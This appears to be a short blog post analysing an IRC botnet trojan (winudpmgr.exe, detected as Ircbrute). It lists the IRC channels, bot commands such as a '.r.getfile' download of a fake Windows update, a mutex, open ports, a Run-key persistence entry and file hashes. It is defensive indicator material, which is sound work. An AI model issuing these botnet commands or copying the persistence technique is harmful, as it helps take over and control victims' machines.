Remote Host Port Number 8067
#. 4 [+mu]
#.. 273 [+mu]
#opers 2 [+mu]
#msn 617 [+mMu]
#syn 290 [+mMu]
#baba 126 [+mu]
.r.getfile C:/windowUpdate.exe 1
.indir 1
.login baban
bots at #baba login = ( .login baban )
at #msn = ( .l injecter )
.r.getfile C:/windowUpdate.exe 1

NICK [00|USA|807464]

Other details

* To mark the presence in the system, the following Mutex object was created:
o Gangsta

* The following ports were open in the system:

Port Protocol Process
1033 TCP winudpmgr.EXE (%Windir%winudpmgr.EXE)
1034 TCP winudpmgr.EXE (%Windir%winudpmgr.EXE)

* The following Host Name was requested from a host database:

Registry Modifications

* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Windows UDP Control Center = “winudpmgr.exe”

so that winudpmgr.exe runs every time Windows starts

Memory Modifications

* There were new processes created in the system:

Process Name Process Filename Main Module Size
winudpmgr.exe %Windir%winudpmgr.exe 315 392 bytes
[filename of the sample #1] [file and pathname of the sample #1] 69 632 bytes

File System Modifications

* The following file was created in the system:

# Filename(s) File Size File Hash Alias
1 [file and pathname of the sample #1]
%Windir%winudpmgr.exe 90 644 bytes MD5: 0x3A97DAAA59E1AA0B0D387A2C8B26C165
SHA-1: 0x45BB30ED6BB464634E43E94485E72446276E91F1 Trojan.Win32.Midgare.apkk [Kaspersky Lab]
Generic.dx!tgh [McAfee]
Trojan:Win32/Ircbrute [Microsoft]
Trojan.Win32.Ircbrute [Ikarus]

Categories: Uncategorized

1 Comment

建邱勳 - August 6, 2010 at 2:06 pm

Comments are closed